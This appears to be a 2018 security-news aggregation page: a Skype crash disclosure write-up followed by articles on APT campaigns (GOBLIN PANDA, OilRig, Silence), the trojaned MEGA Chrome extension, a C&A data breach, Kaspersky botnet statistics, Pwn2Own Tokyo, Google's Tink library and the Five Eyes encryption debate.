7fb4f0ed3000-7fb4f0eea000 rw-p 000c1000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0eea000-7fb4f12eb000 rw-s 00000000 00:1a 112 /dev/shm/.org.chromium.Chromium.8b0GDI (deleted)
7fb4f12eb000-7fb4f132b000 rw-s 00000000 00:1a 110 /dev/shm/.org.chromium.Chromium.wo010t (deleted)
7fb4f136b000-7fb4f13ab000 rw-s 00000000 00:1a 108 /dev/shm/.org.chromium.Chromium.4MWzbK (deleted)
7fb4f13ab000-7fb4f13eb000 rw-s 00000000 00:1a 107 /dev/shm/.org.chromium.Chromium.PCNSgn (deleted)
7fb4f13eb000-7fb4f142b000 rw-s 00000000 00:1a 106 /dev/shm/.org.chromium.Chromium.UUZcm0 (deleted)
7fb4f146b000-7fb4f14ab000 rw-s 00000000 00:1a 104 /dev/shm/.org.chromium.Chromium.MzjVwg (deleted)
7fb4f14bb000-7fb4f14cb000 rw-s 00000000 00:1a 118 /dev/shm/.org.chromium.Chromium.GgMWqU (deleted)
7fb4f14cb000-7fb4f14eb000 rw-s 00000000 00:1a 109 /dev/shm/.org.chromium.Chromium.CbpRGw (deleted)
7fb4f14eb000-7fb4f152b000 rw-s 00000000 00:1a 38 /dev/shm/.org.chromium.Chromium.keWIHw (deleted)
7fb4f152b000-7fb4f156b000 rw-s 00000000 00:1a 102 /dev/shm/.org.chromium.Chromium.9HJ9M9 (deleted)
7fb4f1577000-7fb4f1587000 rw-s 00000000 00:1a 113 /dev/shm/.org.chromium.Chromium.UPK1Ee (deleted)
7fb4f1587000-7fb4f15eb000 rw-s 00000000 00:1a 34 /dev/shm/.org.chromium.Chromium.leYub6 (deleted)
7fb4f15eb000-7fb4f162b000 rw-s 00000000 00:1a 97 /dev/shm/.org.chromium.Chromium.6IeB32 (deleted)
7fb4f162b000-7fb4f1a2c000 rw-s 00000000 00:1a 85 /dev/shm/.org.chromium.Chromium.6d3WFD (deleted)
7fb4f1a2c000-7fb4f1a6c000 rw-s 00000000 00:1a 83 /dev/shm/.org.chromium.Chromium.IjR5gj (deleted)
7fb4f1a6c000-7fb4f1aac000 rw-s 00000000 00:1a 88 /dev/shm/.org.chromium.Chromium.cG4AwK (deleted)
7fb4f1aac000-7fb4f1aec000 rw-s 00000000 00:1a 77 /dev/shm/.org.chromium.Chromium.StnttE (deleted)
7fb4f1aec000-7fb4f1b2c000 rw-s 00000000 00:1a 71 /dev/shm/.org.chromium.Chromium.xRFG4j (deleted)
7fb4f1b2c000-7fb4f1b2d000 ---p 00000000 00:00 0
7fb4f1b2d000-7fb4f25f5000 rw-p 00000000 00:00 0
7fb4f25f5000-7fb4f25f6000 ---p 00000000 00:00 0
7fb4f25f6000-7fb4f2df6000 rw-p 00000000 00:00 0
7fb4f2df6000-7fb4f2dfb000 r-xp 00000000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/
7fb4f2dfb000-7fb4f2ffb000 ---p 00005000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/
7fb4f2ffb000-7fb4f2ffc000 r--p 00005000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/
7fb4f2ffc000-7fb4f2ffd000 rw-p 00006000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/
7fb4f2ffd000-7fb4f2ffe000 ---p 00000000 00:00 0
7fb4f2ffe000-7fb4f37fe000 rw-p 00000000 00:00 0
7fb4f37fe000-7fb4f37ff000 ---p 00000000 00:00 0
7fb4f37ff000-7fb4f3fff000 rw-p 00000000 00:00 0
7fb4f3fff000-7fb4f8000000 rw-s 00000000 00:1a 7 /dev/shm/pulse-shm-796608596
7fb4f8000000-7fb4f8083000 rw-p 00000000 00:00 0
7fb4f8083000-7fb4fc000000 ---p 00000000 00:00 0
7fb4fc000000-7fb4fc021000 rw-p 00000000 00:00 0
7fb4fc021000-7fb500000000 ---p 00000000 00:00 0
7fb500000000-7fb500021000 rw-p 00000000 00:00 0
7fb500021000-7fb504000000 ---p 00000000 00:00 0
7fb504000000-7fb504021000 rw-p 00000000 00:00 0
7fb504021000-7fb508000000 ---p 00000000 00:00 0
7fb508000000-7fb508021000 rw-p 00000000 00:00 0
7fb508021000-7fb50c000000 ---p 00000000 00:00 0
7fb50c000000-7fb50c30a000 rw-p 00000000 00:00 0
7fb50c30a000-7fb510000000 ---p 00000000 00:00 0
7fb510000000-7fb510028000 rw-p 00000000 00:00 0
7fb510028000-7fb514000000 ---p 00000000 00:00 0
7fb514000000-7fb514008000 rw-s 00000000 00:1a 187 /dev/shm/.org.chromium.Chromium.wp000v (deleted)
7fb514008000-7fb514048000 rw-s 00000000 00:1a 68 /dev/shm/.org.chromium.Chromium.kV2UFZ (deleted)
7fb514048000-7fb514088000 rw-s 00000000 00:1a 87 /dev/shm/.org.chromium.Chromium.JUxFl8 (deleted)
7fb514088000-7fb5140c8000 rw-s 00000000 00:1a 65 /dev/shm/.org.chromium.Chromium.476qSk (deleted)
7fb5140c8000-7fb514108000 rw-s 00000000 00:1a 96 /dev/shm/.org.chromium.Chromium.1d878F (deleted)
7fb514108000-7fb514148000 rw-s 00000000 00:1a 86 /dev/shm/.org.chromium.Chromium.IHmLaw (deleted)
7fb514148000-7fb51414a000 r-xp 00000000 08:01 8917743 /lib/x86_64-linux-gnu/
7fb51414a000-7fb514349000 ---p 00002000 08:01 8917743 /lib/x86_64-linux-gnu/libnss_mdns4_mini
Cool, so when I read the backtrace, I understood that this might be a memory corruption in `malloc()`.

So basically, the memory allocator allocates pages of memory at once for use of programs, and it gives you a pointer within them. Since this files which I am trying to share may be larger for skype to handle during the call (PS: I was just sharing a jpg file in this case which was of 800kB). But for skype if a larger program is allocating larger amounts of memory and writing further past the end of your allocated space, then you’ll end up attempting to write into unallocated memory and may cause a memory corruption.

Being a fan of responsible disclosure, I submitted this to Microsoft on 8 August 2018, but MS says “Upon investigation, we have determined that this submission does not meet the bar for security servicing” 🤦

Okay, but I passed on this message to skype team on twitter, and they looked into this!

skype bug
At last, this was patched on Skype version on Linux.

CrowdStrike uncovered a new campaign of GOBLIN PANDA APT aimed at Vietnam
6.9.2018 securityaffairs APT

Researchers from security firm CrowdStrike have observed a new campaign associated with the GOBLIN PANDA APT group.
Experts from security firm CrowdStrike have uncovered a new campaign associated with the GOBLIN PANDA APT group.

The group also knows as Cycldek was first spotted in September 2013, it was mainly targeting entities in Southeast Asia using different malware variants mainly PlugX and HttpTunnel.

In 2014, experts noticed an intensification in the activity of the group that appeared interested in the dispute over the South China Sea.

GOBLIN PANDA was focused on Vietnam, most of the targets were in the defense, energy, and government sectors.

The group is back and is targeting once again Vietnam running a spear phishing campaign that uses weaponized documents featuring Vietnamese-language lures and themes

“Last month, CrowdStrike Intelligence observed renewed activity from GOBLIN PANDA targeting Vietnam. As part of this campaign, new exploit documents were identified with Vietnamese-language lures and themes, as well as Vietnam-themed, adversary-controlled infrastructure.” reads the analysis published by CrowdStrike.

“Two exploit documents with Vietnamese-language file names were observed with file metadata unique to the GOBLIN PANDA adversary.”

The researchers analyzed two weaponized documents written in Vietnamese-language and attributed them to GOBLIN PANDA based their metadata.

The decoy documents have training-related themes and trigger the Office vulnerability CVE-2012-0158 flaw to deliver a malware implant tracked as QCRat by CrowdStrike Falcon Intelligence.

The document did not specifically reference projects related to the Vietnamese government or departments, however, they could be used to trick Government of Vietnam personnel to open them.

According to CrowdStrike, the decoy documents use a previously identified legitimate executable, a side-loading implant Dynamic Link Library (DLL), and new implant configuration files stored as a .tlb file.

The analysis of command and control servers suggests that GOBLIN PANDA hackers are also targeting entities in Laos.

“Analysis of command and control infrastructure suggests that GOBLIN PANDA is targeting entities in Laos, as well. CrowdStrike Intelligence has not directly observed Laotian targeting, and cannot confirm targets in Laos for this campaign, however, previous activity linked to GOBLIN PANDA has targeted this country.” concludes the report.

“Given major economic initiatives by China, such as the Belt and Road Initiative and continued dispute over the Paracel Islands, it is unlikely that GOBLIN PANDA will abandon efforts to collect intelligence from South East Asian neighbors and businesses operating in that region,”

Group-IB UncoversAPT- attacks on Banks: The Sound of Silence
6.9.2018 securityaffairs APT

Researchers at security firm Group-IB have exposed the attacks carried out by the Silence cybercriminal group, providing details on its tactics and tools.
Experts at security firm Group-IB have exposed the attacks committed by Silence cybercriminal group. While the gang had previously targeted Russian banks, Group-IB experts also have discovered evidence of the group’s activity in more than 25 countries worldwide.

Group-IB has published its first detailed report “Silence: Moving into the darkside” on tactics and tools employed by the cybercriminals. Group-IB security analysts’ hypothesis is that at least one of the gang members appears to be a former or current employee of a cyber security company. The confirmed damage from Silence activity is estimated at 800 000 USD.

After the activity of Cobalt group has declined, Silence became one of the major threats to Russian and international banks. Once only known to cybersecurity specialists, Silence is an example of a mobile, small, and young group that has been progressing rapidly. Confirmed thefts by Silence increased more than fivefold from just 100 000 USD in 2017 to 550 000 USD in less than a year. The current confirmed total thefts form Silence attacks stands at 800 000 USD.

For more than two years, there was not a single sign of Silence that would enable to identify them as an independent cybercrime group. The timeline and nature of the attacks identified by Group-IB forensic specialists suggested strongly that the first attacks were very amateur in nature and the criminals were learning as they went along. Since autumn 2017, the group has become more active. Based on analysis and comparison with other incidents and financial APT timelines, it is clear that Silence analyses methods of other criminal groups and applies new tactics and tools on various banking systems – AWS CBR (Automated Work Station Client of the Russian Central Bank), ATMs, and card processing.

Group-IB incident response and intelligence teams detected Silence’s activity in 2016 for the very first time. Silence members attempted to withdraw money via AWS CBR; however, due to some errors in payment orders, the theft was successfully prevented. In 2017, Silence began to conduct attacks on ATMs. The first incident confirmed by Group-IB revealed that gang members stole 100 000 USD from ATMs in just one night. In 2018, they targeted card processing using supply-chain attack, picking up 550 000 USD via ATMs of the bank’s counterpart over one weekend. In April 2018, two months after they successfully targeted card processing, the group decided to leverage its previous scheme and stole roughly 150 000 USD through ATMs. At this point, the attacks described above can be unequivocally attributed to Silence, but Group-IB security experts believe that there have been other successful attacks on banks. Silence Group

Who are Silence?

Group-IB experts concluded that Silence is a group of Russian-speaking hackers, based on their commands language, the location of infrastructure they used, and the geography of their targets (Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan). Although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia). Furthermore, Silence used Russian words typed on an English keyboard layout for the commands of the employed backdoor. The hackers also used Russian-language web hosting services.

There appear to be just two members in Silence—a developer and an operator. This explains why they are so selective in their attack targets, and why it takes them so long (up to 3 months, which is at least three times longer than Anunak, Buhtrap, MoneyTaker and Cobalt) to commit a theft. One gang member – a developer – has skills of a highly experienced reverse engineer. He develops tools to conduct attacks and modifies complex exploits and software. However, in development he makes a number of errors, that are quite common for virus analysts or reverse engineers; he knows exactly how to develop software, but he does not know how to program properly. The second member of the team is an operator. He has experience in penetration testing, which means he can easily find his way around banking infrastructure. He is the one who uses the developed tools to access banking systems and initiates the theft process.

Silence’s tools and methods

Like most cybercrime groups, Silence uses phishing emails. Initially, the group used hacked servers and compromised accounts for its campaigns. Later on, the criminals began to register phishing domains, for which they created self-signed certificates. Silence designs very well-crafted phishing emails usually purporting to be from bank employees. To conduct their phishing campaigns, the hackers rent servers in Russia and the Netherlands. Silence also uses Ukraine-based hosting services to rent servers to use as C&C servers. A number of servers were rented at MaxiDed, whose infrastructure was blocked by Europol in May 2018.

In their first operations, Silence used a borrowed backdoor – Kikothac, which makes it clear that the group began its activity without any preparation—these were attempts to test the waters. Later, the group’s developer created a unique set of tools for attacks on card processing and ATMs including Silence— a framework for infrastructure attacks , Atmosphere—a set of software tools for attacks on ATMs, Farse—a tool to obtain passwords from a compromised computer, and Cleaner—a tool for logs removal.

“Silence, in many ways, is changing the perception of cybercrime in terms of the nature of the attacks, the tools, tactics, and even the members of the group. It is obvious that the criminals responsible for these crimes were at some point active in the security community. Either as penetration testers or reverse engineers,” says Dmitry Volkov, Chief Technology Officer and Head of Threat Intelligence at Group-IB.

“They carefully study the attacks conducted by other cybercriminal groups, and analyse antivirus and Threat Intelligence reports. However, it does not save them from making mistakes; they learn as they go. Many of Silence’s tools are legitimate, others they developed themselves and learn from other gangs. After having studied Silence’s attacks, we concluded that they are most likely white hats evolving into black hats. The Internet, particularly the underground web, favours this kind of transformation; it is far easier now to become a cybercriminal than 5–7 years ago—you can rent servers, modify existing exploits, and use legal tools. It makes things more complicated for blue teams and much easier for hackers”.

MEGA Chrome browser extension hacked, bogus version stole users’ credentials
6.9.2018 securityaffairs Incindent

The MEGA Chrome browser extension had been hacked and replaced with a one that steals users’ credentials for popular web services
Are you using the MEGA Chrome browser extension? Uninstall it now because the Chrome extension for MEGA file storage service had been hacked and replaced with a one that steals users’ credentials for popular web services (i.e. Amazon, Microsoft, Github, and Google) and private keys for cryptocurrency wallets (i.e. MyEtherWallet and MyMonero, and cryptocurrency trading platform.).

According to Mega, on 4 September at 14:30 UTC, an attacker hacked into the company Google Chrome web store account and uploaded a malicious version 3.39.4 of the extension.

“On 4 September 2018 at 14:30 UTC, an unknown attacker uploaded a trojaned version of MEGA’s Chrome extension, version 3.39.4, to the Google Chrome webstore.” reads the security advisory published by Mega.

“Upon installation or autoupdate, it would ask for elevated permissions (Read and change all your data on the websites you visit) that MEGA’s real extension does not require and would (if permissions were granted) exfiltrate credentials for sites including,,, (for webstore login),,, and HTTP POST requests to other sites, to a server located in Ukraine. Note that credentials were not being exfiltrated.”

Once installed, or after an auto-update, the malicious Mega Chrome extension asked for elevated permissions to steal the sensitive data and send it back a server controlled by the attackers that is located in Ukraine (megaopac[.]host).

After four hours the security breach, Mega updated a clean version (3.39.5) on the store, and affected installations were auto updated., Google removed the malicious extension from the Chrome webstore five hours after the breach.

“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled, and you accepted the additional permission, or if you freshly installed version 3.39.4,” continues the advisory.

Mega highlighted that Google disallowed publishers to sign their Chrome extensions and opted to rely solely on signing them automatically once the extension is uploaded, opening the door to similar compromise.

The Italian security researcher who handles the Twitter account @serhack_ first reported the breach on both Reddit and Twitter.



Version: 3.39.4

It catches your username and password from Amazon, GitHub, Google, Microsoft portals!! It could catch #mega #extension #hacked@x0rz

7:16 PM - Sep 4, 2018
1,701 people are talking about this
Twitter Ads info and privacy
At the time it is not clear how many users have installed the malicious MEGA Chrome browser extension, experts speculate tens of millions of users. may have been affected.

The Firefox version of MEGA has not been compromised and Users accessing without the Chrome extension have not been affected.

“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled and you accepted the additional permission, or if you freshly installed version 3.39.4.” the company added.

“Please note that if you visited any site or made use of another extension that sends plain-text credentials through POST requests, either by direct form submission or through a background XMLHttpRequest process (MEGA is not one of them) while the trojaned extension was active, consider that your credentials were compromised on these sites and/or applications.”

Users who had installed the malicious MEGA Chrome browser extension must uninstall the version 3.39.4 and change passwords for all their accounts.

@SerHack published an interesting post on the hack, I suggest you read it.

New OilRig APT campaign leverages a new variant of the OopsIE Trojan

6.9.2018 securityaffairs APT
The Iran-linked APT group OilRig was recently observed using a new variant of the OopsIE Trojan that implements news evasion capabilities.
Experts at Palo Alto observed a new campaign carried out by the Iran-linked APT group OilRig that was leveraging on a new variant of the OopsIE Trojan.

The OilRig hacker group is an Iran-linked APT that has been around since at least 2015, since then it targeted mainly organizations in the financial and government sectors, in the United States and Middle Eastern countries.

The OopsIE Trojan is one of the malware in the APT’s arsenal that was detected for the first time in February 2018.

In July the hackers leveraged a new variant of the Trojan that implements new anti-analysis and evasion detection capabilities.

The OopsIE variant used in the last campaign begins its execution by performing a series of anti-analysis checks.

It would check CPU fan information (it is the first time a malware checks CPU fan info), temperature, mouse pointer, hard disk, motherboard, time zone, and human interaction, while also looking for DLLs associated with Sandboxie, VBox, and VMware.

The campaign was also delivering the QUADAGENT backdoor, anyway, experts noticed the group using a different malware for each targeted organization.

“In July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle Eastern government agency. During that wave, we also observed OilRig leveraging additional compromised email accounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the payload instead of QUADAGENT.” reads the analysis published by Paolo Alto Network

“The OopsIE attack also targeted a government agency within the same nation state, though a different organization than the one targeted delivering QUADAGENT.”

The hackers launched spear phishing attacks against a government agency using compromised email accounts at a government organization in the same country in the Middle East.

The OilRig hackers sent the phishing messages to the email address of a user group that had published documents regarding business continuity management, the subject of the messages was in Arabic, which translated to “Business continuity management training”.

The new OopsIE variant would check the TimeZone.CurrentTimeZone.DaylightName property, it runs only in presence of strings for Iran, Arab, Arabia, and Middle East.

The attack is highly targeted because the previous check allows hitting only five time zones that encompass 10 countries.

Oilrig OopsIE

The new variant connects the www.windowspatch[.]com domain as domain and also sleeps for two seconds, then moves itself to the App Data folder and creates a scheduled task to run a VBScript to gain persistence every three minutes.

The malware supports various commands, it can write the output to a file and send it to the server, download a file to the system, read a specified file and upload its contents, and uninstall itself.

“The OilRig group remains a persistent adversary in the Middle East region. They continue to iterate and add capabilities to their tools while still functionally using the same tactics over and over again.” concludes the report.

“Within the time frame we have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found functionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication to their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary is highly resourceful and continues to adapt over time,” Palo Alto Networks concludes.

International clothing chain C&A in Brazil suffered a data breach

6.9.2018 securityaffairs Incindent
The clothing chain C&A in Brazil suffered a cyber attack on its gift card/exchange system last week, hackers leaked data on Pastebin.
The International fashion retail clothing chain C&A in Brazil suffered a data breach, the company confirmed hackers hit its gift card platform.

Hackers accessed to records belonging to customers who purchased gift cards, exposed data includes ID numbers, email addresses, the amount loaded into the cards, order number and data of purchase.

A member of the Fatal Error Crew hacker group that use the moniker @joshua has published on Pastebin the data from C&A customers who purchased gift cards online.

“Since you like to play with the data of others, we’ve decided to play around with your systems,” wrote hacker Joshua when he published the data.

“We would like to point out that we do not have the list of Gift Cards C & A or any other list of personal information of the customer, we mapped the same through the ID and only posted some internal information for staff C & A confirms the invasion We will not distribute any personal information on the internet since we do not endorse financial crimes Customer data is secure, the few published GiftCards were in the return section, so they would be discarded – Fatal Error Crew “reads a statement published by The Fatal Error Crew.

According to the Brazilian website Tecmundo, data of about 36,000 customers have been exposed in the attack.

“In a conversation with TecMundo, Joshua said that four million orders are exposed – Joshua says that “probably” there are data from two million different customers, considering more than one request per customer. Directly in the present card system, with their numbers, are exposed the data of 36 thousand.” reported TecMundo.


According to Brazilian newspaper ‘O Globo,’ the Public Ministry of the Federal District and Territories (MPDFT) has launched an investigation on the data breach fearing that data from 2 million customers of C&A were leaked online.

The company confirmed to have detected the incident last week and immediately started the incident response procedures, it also reported the intrusion to the authorities.

C&A highlighted that it doesn’t use personal data for any unauthorized purposes.

“we reiterate our commitment to ethics and respect to the laws and that we work to offer the best possible experience to our customers, and that includes the online environment.” added C&A.

What are botnets downloading?

5.9.2018 Kaspersky   BotNet
Statistics for the past year on files downloaded by botnets
Spam mailshots with links to malware and bots downloading other malware are just a couple of botnet deployment scenarios. The choice of infectious payload is limited only by the imagination of the botnet operator or customer. It might be a ransomware, a banker, a miner, a backdoor, the list goes on, and you don’t need to go far for examples: take Gandcrab and Trik, or Locky and Necurs, for instance. Every day we intercept numerous file-download commands sent to bots of various types and families. Here we present the results of our botnet activity analysis for H2 2017 and H1 2018.

Excluded from the statistics are update files downloaded by bots, since their number depends heavily on the algorithm of the particular malware in question and has an impact on the final distribution. The analysis also excludes configuration files whose download depends on the botnet algorithm and is not relevant to this article. What’s more, we only took account of unique (in terms of MD5 hash) files. The results are based on the analysis of commands from more than 60,000 different C&C associated with 150 bot families and their modifications.

Kaspersky Lab tracks the activity of botnets using Botnet Tracking, a technology that emulates infected computers (bots) to retrieve operational data about the actions of botnet operators.

The total number of unique malicious files downloaded by our bots in H1 2018 fell by 14.5% against H2 2017.

Number of unique malicious files, H2 2017 — H1 2018 (download)

Most popular
After analyzing the files downloaded by the bots, we identified the most widespread families. Note that the top of the list of most “popular” downloads changes little over time. In 2018, as last year, the backdoor njRAT accounted for many downloads. Its share among all files downloaded by bots increased from 3.7% to 5.2%, meaning that more than 1 in each 20 bot-downloaded files is njRAT. This widespread distribution is due to the variety of versions of the malware and the ease of setting up one’s own backdoor, creating a low entry threshold.

H2 2017 Share H1 2018 Share
1 Lethic 17.0% njRAT 5.2%
2 Neutrino.POS 4.6% Lethic 5.0%
3 njRAT 3.7% Khalesi 4.9%
4 Emotet 3.5% Miners 4.6%
5 Miners 2.9% Neutrino.POS 2.2%
6 Smoke 1.8% Edur 1.3%
7 Cutwail 0.7% PassView 1.3%
8 Ransomware 0.7% Jimmy 1.1%
9 SpyEye 0.5% Gandcrab 1.1%
10 Snojan 0.3% Cutwail 1.1%
Most downloaded threats, H2 2017 — H1 2018

Very often, botnets are used to distribute cryptocurrency mining tools. In H1 2018 miners accounted for 4.6% of all downloaded files, a far higher figure than in H2 2017 (2.9%).

Yet cybercriminal interest in ordinary currencies remains high, as evidenced by the presence of Neutrino.POS and Jimmy in the Top 10. In H2 2017, Neutrino.POS was downloaded in 4.6% of all cases. In 2018, its share in the overall stream of downloaded files declined, but its “cousin” Jimmy helped out by adding 1.1% to the share of banking Trojans.

Distribution map of the Top 10 downloaded threats, H2 2017 (download)

In H1 2018, the Trojan Khalesi was in third place in our ranking, accounting for 4.9% of downloaded files. But while in 2017 the Remcos, BetaBot, Smoke, and Panda bots were involved in downloading the Trojan, in 2018 Khalesi was downloaded only by the spam bot Lethic.

On a separate note, the H1 2018 Top 10 features Mail PassView, a legal password recovery tool for various email clients. Distributed via the Remcos backdoor, it is likely used to obtain passwords for victim mailboxes.

The Cutwail, Lethic, and newly rebranded Emotet bots are also firmly rooted in the Top 10.

Compared to H2 2017, the number of ransomware encryptors downloaded by bots has risen this year. Despite the overall decline in the distribution of ransomware programs, botnet operators continue to deliver them to victims. According to our data, most ransomware programs in 2017 were downloaded by the Smoke bot, but in 2018 top spot has been seized by Nitol. GandCrab ransomware is a newbie in the Top 10 most downloaded families of 2018. It appeared in 2018 and was immediately deployed and distributed by several botnet operators, most actively by Trik.

Distribution map of the Top 10 downloaded threats, H1 2018 (download)

In terms of behavior, the clear leaders in both halves are Trojans with such diverse capabilities that it’s difficult to pinpoint their “specialization.” A significant proportion is made up of bankers and backdoors ensuring maximum theft of important information. What’s more, last year’s most common malware included a large number of spam bots, largely due to the above-mentioned Lethic.

Distribution of downloaded files by behavior, H2 2017 — H1 2018 (download)

Most “versatile”
Among the families under observation, we identified the most “versatile” — that is, those downloading the largest number of different files. Such diversity can be the result of several factors:

Different botnets from the same family are managed by different operators with varying objectives.
Operators “lease” their botnets, allowing them to be used to distribute malware.
A botnet changes its “specialization” (for example, Emotet turned from a banking Trojan turned into a spam bot)
In 2018, as in 2017, the most “versatile” bots were Hworm, Smoke, and BetaBot (a.k.a. Neurevt).

Distribution of downloaded files by behavior for Hworm, H2 2017 — H1 2018 (download)

Distribution of downloaded files by behavior for Smoke, H2 2017 — H1 2018 (download)

Distribution of downloaded files by behavior for Betabot, H2 2017 — H1 2018 (download)

As we already mentioned, hidden mining software is very popular, as confirmed by the statistics. Despite the variety of downloaded malware, miners invariably end up in the Top 3.

Backdoors also feature heavily due to the wide-ranging options they provide for cybercriminals, from saving screenshots and keystrokes to direct control over the target device.

Most “international”
In terms of territorial distribution of control servers, the backdoor Njrat unsurprisingly claimed the “most international” prize, with C&C centers in 99 countries. This geographical scope is down to the ease of configuring a personal backdoor, allowing anyone to create their own botnet with minimal knowledge of malware development.

Distribution map of Njrat C&C centers, H2 2017 — H1 2018 (download)

Next come the backdoors DarkComet and NanoCore RAT. They share silver and bronze, having C&Cs in almost 80 countries worldwide. Despite the arrest of the creator of NanoCore, he managed to sell the source code of his privately developed RAT, which is now actively used by other cybercriminals.

Distribution map of DarkComet C&C centers, H2 2017 — H1 2018 (download)

Distribution map of NanoCore RAT C&C centers, H2 2017 — H1 2018 (download)

A look at the geography of infection targets reveals that another backdoor, QRAT, has the largest reach. In H2 2017, we registered infection attempts in 190 countries, and this year QRAT added two more countries, bringing the total to 192.

QRAT distribution map, H2 2017 — H1 2018 (download)

This extensive scope is due to the SaaS (Software-as-a-Service), or rather MaaS (Malware-as-a-Service), distribution model QRAT can be purchased for 30 or 90 days, or for one year. Its cross-platform nature (the malware is written in Java) also plays a role.

By intercepting bot commands, we can track the latest trends in the world of virus writers and provide maximum protection for our users.

Here are the main trends that we identified from analyzing files downloaded by bots:

The share of miners in bot-distributed files is increasing, as cybercriminals have begun to view botnets as a tool for mining cryptocurrency.
Backdoors consistently make up the bulk of downloads; that is, botnet operators are keen to gain maximum possible control over infected devices.
The number of downloaded droppers is also on the rise, indicative of attacks that are multistage and growing in complexity.
The share of banking Trojans among bot-downloaded files in 2018 decreased, but it’s too soon to speak of an overall reduction in number, since they are often delivered by droppers (see above).
Increasingly, botnets are leased according to the needs of the customer, and in many cases it is difficult to pinpoint the “specialization” of the botnet.

IoT Category Added to Pwn2Own Hacking Contest
5.9.2018 securityweek  Congress

This year’s mobile-focused Pwn2Own hacking competition organized by Trend Micro’s Zero Day Initiative (ZDI) will include a new category for Internet of Things (IoT) devices.

The event, whose name has been changed from Mobile Pwn2Own to Pwn2Own Tokyo as a result of the expansion, will take place alongside the PacSec security conference in Tokyo, Japan, on November 13 – 14.

Hackers can earn over $500,000 in cash and prizes if they manage to find and exploit vulnerabilities in devices from Google, Apple, Samsung, Huawei, Xiaomi, Amazon and Nest.

In the new IoT category, contestants can earn up to $60,000 if they can execute arbitrary code without user interaction on Apple Watch Series 3, Amazon Echo (2nd generation), Google Home, Nest Cam IQ Indoor and Amazon Cloud Cam devices.

In the web browsers category, security experts can receive a cash prize of $25,000 for hacking the default browser on Huawei P20, Xiaomi Mi6, and Samsung Galaxy S9, and $50,000 for a successful exploit against the browsers running on Apple’s iPhone X, and Google’s Pixel 2.

In the short distance category, which includes Wi-Fi, Bluetooth, and near field communication (NFC), ZDI is offering up to $30,000 and up to $60,000 – exploits targeting devices from Apple and Google are worth the higher amount.

Hacking a device simply by sending it a SMS/MMS message or getting its owner to view a message can earn Pwn2Own Tokyo contestants as much as $75,000.

The highest rewards are offered this year for baseband attacks, which involve the target device communicating with a rogue base station. Researchers can get up to $50,000 for a successful exploit against Huawei, Xiaomi and Samsung devices, and up to $150,000 for hacking Apple and Google phones.

Pwn2Own Tokyo prizes

In the browser and short-range categories, participants can earn an extra $20,000 if their exploit payload is executed with kernel privileges. There is also a persistence bonus for these categories: $50,000 if the exploit survives a reboot on an iPhone X, and $25,000 if it survives a reboot on a Pixel 2.

Registration for Pwn2Own Tokyo closes on November 7 at 5:00 p.m. Japan Standard Time.

At last year’s event, hackers earned more than half a million dollars after successfully demonstrating exploits against the Samsung Galaxy S8, the Apple iPhone 7 and the Huawei Mate 9 Pro. No attempts were made against the Google Pixel.

Google Introduces Open Source Cross-Platform Crypto Library
5.9.2018 securityweek  Crypto

Google last week took the wraps off Tink, an open source, multi-language, cross-platform cryptographic library designed to help simplify common encryption operations.

Under development for the past two years, the cryptographic library has been available on GitHub since its early days and has already attracted a few external contributors.

Now at version 1.2.0 and with support for cloud, Android, iOS, and more, the library is already being used to secure data of Google products such as AdMob, Google Pay, Google Assistant, Firebase, the Android Search App, and others.

Built on top of existing libraries such as BoringSSL and Java Cryptography Architecture, Tink also includes a series of countermeasures that aim at mitigating weaknesses that Google’s Project Wycheproof discovered in those libraries.

Tink can simplify many common cryptographic operations. Data encryption, digital signatures, and more would only require a few lines of code, the Internet giant claims.

The library is providing cryptographic APIs that Google says are secure, as well as easy to use correctly, but harder to misuse.

“Tink aims to eliminate as many potential misuses as possible. For example, if the underlying encryption mode requires nonces and nonce reuse makes it insecure, then Tink does not allow the user to pass nonces,” Google explains.

The goal when building the library was to make it easy to improve product security. Thus, Tink shows the claimed security properties right in the interfaces, so that both security auditors and automated tools can quickly find instances where the security guarantees don’t match the security requirements.

Furthermore, the library isolates APIs for potentially dangerous operations, thus enabling the discovery, restriction, monitoring, and logging of these APIs’ usage.

Support for key management was also included in the library, including key rotation and phasing out deprecated ciphers, Google says.

Also designed to be extensible, Tink simplifies the addition of custom cryptographic schemes or in-house key management systems. All of Tink’s components are easy to replace or remove, all “are composable, and can be selected and assembled in various combinations,” Google says.

This means that anyone who only needs digital signatures, for example, can simply exclude symmetric key encryption components from the library, thus minimizing code size in their application.

'Five Eyes' Agencies Demand Reignites Encryption Debate
5.9.2018 securityweek  BigBrothers

Privacy and human rights organizations expressed concern Tuesday after a coalition of intelligence agencies renewed a call for technology companies to allow so-called "backdoor" access to encrypted content and devices.

The reaction came following a weekend statement from the "Five Eyes" intelligence agencies calling on "industry partners" to provide a way for law enforcement to access encrypted content that may not be available even with a search warrant.

The call by the agencies from the United States, Britain, Canada, Australia and New Zealand threatens to reignite a long-simmering debate on encryption.

"Many of the same means of encryption that are being used to protect personal, commercial and government information are also being used by criminals, including child sex offenders, terrorists and organized crime groups to frustrate investigations and avoid detection and prosecution," said the statement from the five countries issued by Australia's Department of Home Affairs.

Without voluntary cooperation, the agencies said, "we may pursue technological, enforcement, legislative or other measures to achieve lawful access solutions."

While some law enforcement agencies contend that encryption is being used to shield criminal activity, tech firms and privacy activists argue that any weakening of encryption would harm security for all users.

"The risk is that these countries will compel providers to build a backdoor that not only governments will exploit but hackers, criminals and other bad guys will use as well," said Greg Nojeim of the Washington-based Center for Democracy & Technology.

"It would weaken cybersecurity at the same time governments are preaching that cybersecurity needs to be addressed."

Marc Rotenberg, president of the Electronic Privacy Information Center, called the latest effort "a short-sighted and counterproductive proposal" and added that "it has become clear that encryption is vital for both privacy and public safety."

